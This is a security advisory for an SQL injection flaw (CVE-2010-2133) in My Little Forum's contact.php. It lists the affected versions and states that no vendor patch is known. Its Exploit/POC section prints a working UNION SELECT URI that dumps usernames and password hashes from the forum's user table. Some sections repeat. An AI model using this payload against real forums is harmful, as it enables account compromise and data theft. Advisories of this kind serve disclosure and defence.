My Little Forum 'contact.php' SQL Injection Vulnerability
BID:38485
Info
My Little Forum 'contact.php' SQL Injection Vulnerability
| Bugtraq ID: | 38485 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-2133 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 02 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | Easy Laster |
| Vulnerable: |
my little homepage my little forum 2004.4.20 my little homepage my little forum 2.1.4 my little homepage my little forum 2.0.2 my little homepage my little forum 1.6 beta my little homepage my little forum 1.5 my little homepage my little forum 1.3 my little homepage my little forum 2.0 Beta 24 my little homepage my little forum 2.0 Beta 23 my little homepage my little forum 1.75 my little homepage my little forum 1.7 |
| Not Vulnerable: | |
Discussion
My Little Forum 'contact.php' SQL Injection Vulnerability
My Little Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
My Little Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
My Little Forum 'contact.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/forum/contact.php?id=-11111111'+
union+select+1,2,concat(user_name,0x3a,user_pw),4,5+from+forum_userdata+where+user_id=1--+
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/forum/contact.php?id=-11111111'+
union+select+1,2,concat(user_name,0x3a,user_pw),4,5+from+forum_userdata+where+user_id=1--+
Solution / Fix
My Little Forum 'contact.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
My Little Forum 'contact.php' SQL Injection Vulnerability
References:
References:
- my little forum Homepage (my little homepage)